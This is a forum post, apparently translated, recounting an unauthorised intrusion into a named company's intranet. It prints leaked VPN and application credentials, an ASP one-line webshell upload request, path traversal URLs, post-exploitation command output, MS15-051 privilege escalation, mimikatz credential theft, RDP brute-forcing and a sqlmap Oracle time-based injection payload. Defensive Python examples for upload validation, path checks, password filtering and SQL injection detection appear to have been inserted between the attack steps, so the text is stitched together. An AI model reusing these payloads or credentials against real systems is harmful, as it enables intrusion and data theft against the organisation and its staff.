HanDs
NO.2

[July vulnerability disclosure] Information mining: GetShell on a Xiashang Group intranet server & Xiashang Group intranet reconnaissance (QQ group penetration case)






Details:

Today, through a QQ group search engine, I came across a group like this.




Aquatic Products & Property Management Software Team 271170721

https://59.61.80.154:10443/sslvpn/portal.html  account: user, password: seashinegroup

(software) http://10.0.0.157:7000/Login.aspx  account: xs, password: 123

This leaked the VPN address and its credentials, along with the credentials for an intranet application.

First, connect to the VPN.




Then open that intranet address and log in.




Found an upload function in the back end.






POST /Modules/Controllers/Receivefile.aspx HTTP/1.1
Host: 10.0.0.157:7000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://10.0.0.157:7000/Modules/RentalDeleteApp/CustmerDeleteEdit.aspx?act=add&murl=~/MODULES/RENTALDELETEAPP/CUSTMERDELETEMANAGE.ASPX&__r=0.49503681277472933
Cookie: ASP.NET_SessionId=32cygirraxlxni4p53fa0cby
Connection: keep-alive

-----------------------------169631145724068
Content-Disposition: form-data; name="fileToUpload"; filename="cmd.jpg"
Content-Type: image/jpeg

<%eval request("1281441136")%>
-----------------------------169631145724068--



The request had to be modified in transit to get the upload through.
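The stored file kept whatever extension the client-controlled filename carried, and nothing checked that the body was really an image. As an added illustration in Python (not code from the report or from the affected application), this is the server-side check Receivefile.aspx needed; the upload directory and the images-only policy are this example's assumptions:

```python
import os
import secrets
from pathlib import Path

# Assumptions for this example: uploads live outside the web root (so IIS/ASP.NET can
# never execute them) and only JPEG/PNG images are legitimate. The path is hypothetical.
UPLOAD_DIR = Path("/srv/app/uploads")
ALLOWED = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Check one multipart part the way Receivefile.aspx should have; return the
    extension to store under, or raise UploadRejected with the reason."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    # Keep only the final path component; drop NULs and trailing dots/spaces, which
    # Windows strips on save and which are used to smuggle a second extension past checks.
    base = os.path.basename(filename.replace("\\", "/")).replace("\x00", "").rstrip(". ")
    suffixes = Path(base).suffixes          # "cmd.jpg.asp" -> ['.jpg', '.asp']
    # Strict policy: exactly one extension, and it must be on the allowlist.
    if len(suffixes) != 1 or suffixes[0].lower() not in ALLOWED:
        raise UploadRejected(f"extension not allowed: {base!r}")
    ext = suffixes[0].lower()
    # Trust neither the client's Content-Type nor the name: the bytes must carry the
    # image's magic number. The report's cmd.jpg body was ASP source, not JPEG data.
    if content_type.split(";")[0].strip().lower() not in ("image/jpeg", "image/png"):
        raise UploadRejected(f"content type not allowed: {content_type!r}")
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match declared image type")
    # Reject polyglots: a valid image header followed by server-side or script markup.
    if b"<%" in data or b"<script" in data.lower():
        raise UploadRejected("embedded server-side/script markup")
    return ext


def upload_verdict(filename: str, content_type: str, data: bytes) -> str:
    """Convenience wrapper: 'accepted <ext>' or 'rejected: <reason>'."""
    try:
        return "accepted " + validate_upload(filename, content_type, data)
    except UploadRejected as exc:
        return f"rejected: {exc}"


def store_upload(filename: str, content_type: str, data: bytes, upload_dir: Path = UPLOAD_DIR) -> Path:
    """Validate, then persist under a random name so the stored location can never be
    inferred from a download URL, as it could be in the report."""
    ext = validate_upload(filename, content_type, data)
    upload_dir.mkdir(parents=True, exist_ok=True)
    dest = upload_dir / f"{secrets.token_hex(16)}{ext}"
    dest.write_bytes(data)
    return dest


if __name__ == "__main__":
    print(upload_verdict("cmd.jpg", "image/jpeg", b'<%eval request("1281441136")%>'))
    print(upload_verdict("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + bytes(16)))
```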



After uploading the ASP file I didn't know where it had been stored.

Eventually I noticed a download button; inspecting the element gave a URL like this:

http://10.0.0.157:7000/Modules/Introduce/DownLoad.aspx?fname=/Uploads/16-04-01/20160401204804540.asp

A bit of guessing gave the full shell address:

http://10.0.0.157:7000//Uploads/16-04-01/20160401204804540.asp

The same URL also has a file inclusion issue: the fname parameter accepts path traversal.

http://10.0.0.157:7000/Modules/Introduce/DownLoad.aspx?fname=../../../../../zcgl_xs.rar
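The fname parameter reaches the filesystem unchanged, which is why both the traversal and the guessable stored path worked. Added example, not the application's code: a Python version of the containment check DownLoad.aspx needed, plus the response headers for serving such files; WEB_ROOT and the Uploads layout are assumptions.

```python
import re
from pathlib import Path, PurePosixPath
from typing import Optional

# Hypothetical layout for this example: the ASP.NET site root and the Uploads folder that
# DownLoad.aspx is meant to serve from. Neither path comes from the report.
WEB_ROOT = Path("/srv/app/website")
DOWNLOAD_AREA = WEB_ROOT / "Uploads"


def resolve_download(fname: str) -> Optional[Path]:
    """Map a user-supplied fname (as DownLoad.aspx?fname=... receives it) onto a file under
    DOWNLOAD_AREA. Returns the canonical Path, or None when the request must be refused."""
    # Normalise Windows separators, drop NULs, and treat the value as relative to the web root.
    cleaned = fname.replace("\\", "/").replace("\x00", "")
    rel = PurePosixPath(cleaned.lstrip("/"))
    # Refuse traversal components outright instead of trying to "clean" them.
    if not rel.parts or ".." in rel.parts:
        return None
    candidate = (WEB_ROOT / rel).resolve()
    # Canonical containment: the resolved file must sit strictly inside the download area, so
    # /Web.config, the Uploads directory itself, and anything above it are all refused.
    if DOWNLOAD_AREA.resolve() not in candidate.parents:
        return None
    return candidate


def download_headers(path: Path) -> dict:
    """Headers for serving an upload: force a download, stop the browser sniffing or
    rendering it, and neutralise the filename so it cannot inject into the header."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", path.name)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    # The report's legitimate download and two traversal variants.
    for fname in ("/Uploads/16-04-01/20160401204804540.asp",
                  "../../../../../zcgl_xs.rar", "..\\..\\Web.config"):
        print(f"{fname!r:48} -> {resolve_download(fname)}")
```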






D:\App\WebSite\Uploads\16-04-01\> netstat -an

活动连接

  协议  本地地址          外部地址        状态
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7000           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING
  TCP    10.0.0.157:139         0.0.0.0:0              LISTENING
  TCP    10.0.0.157:7000        192.168.100.15:8080    TIME_WAIT
  TCP    10.0.0.157:7000        192.168.100.15:8081    TIME_WAIT
  TCP    10.0.0.157:7000        192.168.100.15:8088    TIME_WAIT
  TCP    10.0.0.157:7000        192.168.100.15:20349   TIME_WAIT
  TCP    10.0.0.157:7000        192.168.100.15:20354   ESTABLISHED
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING
  TCP    [::]:80                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:1433              [::]:0                 LISTENING
  TCP    [::]:3389              [::]:0                 LISTENING
  TCP    [::]:7000              [::]:0                 LISTENING
  TCP    [::]:47001             [::]:0                 LISTENING
  TCP    [::]:49152             [::]:0                 LISTENING
  TCP    [::]:49153             [::]:0                 LISTENING
  TCP    [::]:49154             [::]:0                 LISTENING
  TCP    [::]:49155             [::]:0                 LISTENING
  TCP    [::]:49156             [::]:0                 LISTENING
  TCP    [::]:49157             [::]:0                 LISTENING
  TCP    [::1]:1434             [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:4500           *:*
  UDP    0.0.0.0:5355           *:*
  UDP    10.0.0.157:137         *:*
  UDP    10.0.0.157:138         *:*
  UDP    [::]:123               *:*
  UDP    [::]:500               *:*
  UDP    [::]:4500              *:*
  UDP    [::]:5355              *:*
  UDP    [fe80::78ed:945a:aa9a:c143%11]:546  *:*



Port 3389 is open.



D:\App\WebSite\Uploads\16-04-01\> whoami
iis apppool\zcgl



Low privileges.

D:\App\WebSite\Uploads\16-04-01\> net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    
命令运行完毕,但发生一个或多个错误。







D:\App\WebSite\Uploads\16-04-01\> systeminfo

主机名:           WIN-BM2MUPRKFU1
OS 名称:          Microsoft Windows Server 2008 R2 Enterprise 
OS 版本:          6.1.7600 暂缺 Build 7600
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00486-OEM-8400691-20006
初始安装日期:     2016/3/1, 2:38:18
系统启动时间:     2016/3/26, 3:15:27
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 2 个处理器。
                  [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2666 Mhz
                  [02]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2666 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2012/6/22
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     4,095 MB
可用的物理内存:   3,096 MB
虚拟内存: 最大值: 8,189 MB
虚拟内存: 可用:   7,028 MB
虚拟内存: 使用中: 1,161 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 138 个修补程序。


网卡:             安装了 1 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                        [01]: 10.0.0.157
                        [02]: fe80::78ed:945a:aa9a:c143





Privilege escalation used the MS15-051 exploit.

Download: http://www.tuicool.com/articles/7fUZFnU




Proof of vulnerability:

Scanning the intranet produced a list of live hosts and their open ports.


Started roaming the intranet systems.




Grabbed passwords with mimikatz, the French wonder tool.






From the captured passwords I worked out the password pattern and brute-forced RDP (3389) with DUBrute; the result was a list of valid account and password pairs.

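The brute-force worked because the passwords followed a guessable pattern: an organisation abbreviation followed by a year, or a top-list password. Added example, not from the report: a Python password filter that rejects exactly that pattern; the organisation tokens (derived from names that appear in the report), the 12-character minimum and the three-year window are this example's assumptions.

```python
import re
from datetime import date

# Tokens a brute-forcer would pair with a year against this organisation. Constructed
# for this example from names seen in the report (the "Xsjt" abbreviation, the
# "seashine" brand in the VPN password); a real deployment lists its own.
ORG_TOKENS = ("xsjt", "xiashang", "seashine")
COMMON = {"123456", "12345678", "password", "qwerty", "111111", "admin", "admin123"}
YEAR_RX = re.compile(r"(?:19|20)\d{2}")
LEET = str.maketrans("@$!10345", "asiioeas")   # undo the usual character substitutions
MIN_LENGTH = 12


def password_weaknesses(pw: str, reference_year: int = date.today().year) -> list:
    """Return why pw would fall to the pattern attack in this report (organisation
    token + year, or a top-list password); an empty list means no pattern matched."""
    reasons = []
    if pw.lower() in COMMON:
        reasons.append("common password")
    if len(pw) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH}")
    recent = [y for y in YEAR_RX.findall(pw) if abs(int(y) - reference_year) <= 3]
    if recent:
        reasons.append(f"contains recent year {recent[0]}")
    # Remove the years, then normalise case and leetspeak before looking for org tokens,
    # so Xsjt2016, xsjt_2015 and X5jt2014! all collapse onto "xsjt".
    core = re.sub(r"[^a-z0-9]", "", YEAR_RX.sub("", pw).lower().translate(LEET))
    hit = next((tok for tok in ORG_TOKENS if tok in core), None)
    if hit:
        reasons.append(f"built on organisation token '{hit}'")
    return reasons


if __name__ == "__main__":
    for candidate in ("Xsjt2016", "123456", "SeaShine@2019", "Lumpy-Giraffe-Fills-Cartons"):
        print(f"{candidate:30} {password_weaknesses(candidate, 2016) or 'no pattern matched'}")
```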





There was also an injection point; the request URL and POST body:





http://10.0.0.126/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute





TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=123*









C:\Users\Administrator>sqlmap.py -u "http://10.0.0.126/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute" --data="TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=123*"




[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:47:35

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[10:47:37] [INFO] testing connection to the target URL
[10:47:37] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:47:37] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:47:38] [INFO] testing if the target URL is stable
[10:47:38] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[10:47:40] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[10:47:40] [WARNING] (custom) POST parameter '#1*' does not appear dynamic
[10:47:40] [INFO] heuristics detected web page charset 'utf-8'
[10:47:40] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[10:47:41] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[10:47:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:47:41] [WARNING] reflective value(s) found and filtering out
[10:47:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[10:47:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:47:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:47:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[10:47:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:47:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[10:47:57] [INFO] testing 'MySQL inline queries'
[10:47:58] [INFO] testing 'PostgreSQL inline queries'
[10:47:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[10:47:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[10:48:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:48:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:48:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:48:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[10:48:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:48:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[10:48:12] [INFO] testing 'Oracle AND time-based blind'
[10:48:24] [INFO] (custom) POST parameter '#1*' seems to be 'Oracle AND time-based blind' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y
[10:53:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:53:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:53:34] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
[10:53:34] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[10:53:42] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 121 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper==&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=123' AND 3307=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(67)||CHR(68)||CHR(90),5) AND 'YHld'='YHld
---
[11:16:32] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:16:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\10.0.0.126'
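sqlmap confirmed the injection through a DBMS_PIPE.RECEIVE_MESSAGE delay, and that payload, together with sqlmap's User-Agent, is what a defender can hunt for in application or WAF logs. Added detection example, not part of the report: the regexes also cover the delay functions of other database engines, and the tab-separated log format and sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the technique confirmed in the report (Oracle time-based blind injection
# through DBMS_PIPE.RECEIVE_MESSAGE), the delay functions of other engines, and sqlmap's
# User-Agent. Names are this example's own; tune the list to the application.
SIGNATURES = {
    "oracle_time_blind": re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I),
    "other_time_blind": re.compile(r"\b(?:SLEEP|PG_SLEEP|BENCHMARK)\s*\(|WAITFOR\s+DELAY\b", re.I),
    "chr_concat": re.compile(r"CHR\(\d+\)\s*\|\|\s*CHR\(\d+\)", re.I),
    "and_tautology": re.compile(r"\bAND\s+'([^']*)'\s*=\s*'\1", re.I),
    "sqlmap_ua": re.compile(r"\bsqlmap/", re.I),
}

def decode_param(value: str) -> str:
    """URL-decode twice: payloads are often encoded by the client and again by a proxy."""
    once = unquote_plus(value)
    return unquote_plus(once) if "%" in once else once

def scan_request(user_agent: str, body: str) -> set:
    """Return the signature names that fire on one request's User-Agent and decoded body."""
    hits = set()
    if SIGNATURES["sqlmap_ua"].search(user_agent):
        hits.add("sqlmap_ua")
    for pair in body.split("&"):
        _, _, value = pair.partition("=")          # only values are attacker-controlled here
        decoded = decode_param(value)
        for name, rx in SIGNATURES.items():
            if name != "sqlmap_ua" and rx.search(decoded):
                hits.add(name)
    return hits

def scan_log(lines) -> list:
    """Parse constructed tab-separated lines (timestamp, source, path, User-Agent, body) and
    return (timestamp, source, path, sorted hits) for each line that trips a signature."""
    findings = []
    for line in lines:
        ts, src, path, ua, body = line.rstrip("\n").split("\t")
        hits = scan_request(ua, body)
        if hits:
            findings.append((ts, src, path, sorted(hits)))
    return findings

# Constructed sample lines modelled on the report's ActionServlet request: a normal search,
# the sqlmap probe carrying its payload, and a double-encoded tautology behind a browser UA.
PATH = "/service/~iufo/com.ufida.web.action.ActionServlet"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
SAMPLE_LOG = [
    f"2016-05-01T10:47:37\t10.0.0.157\t{PATH}\t{BROWSER_UA}\t"
    "refSearchProp=unit_code&refSearchOper=%3D&refSearchValue=123",
    f"2016-05-01T10:48:24\t10.0.0.157\t{PATH}\tsqlmap/1.0.0.12#dev (http://sqlmap.org)\t"
    "refSearchProp=unit_code&refSearchOper=%3D&refSearchValue=123%27+AND+3307%3D"
    "DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%2867%29%7C%7CCHR%2868%29%7C%7C"
    "CHR%2890%29%2C5%29+AND+%27YHld%27%3D%27YHld",
    f"2016-05-01T10:48:30\t10.0.0.157\t{PATH}\t{BROWSER_UA}\t"
    "refSearchValue=1%2527+AND+%2527a%2527%253D%2527a",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(*finding, sep="  ")
```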





At this point we had control of twelve of the intranet's VMware virtual hosts.





I'll skip the information leakage side; the data held in intranet systems is generally very rich.

Remediation:

Strictly control the entry points.


Post #1
Posted: 2016-7-14   |   Views: 0   |   Replies: 0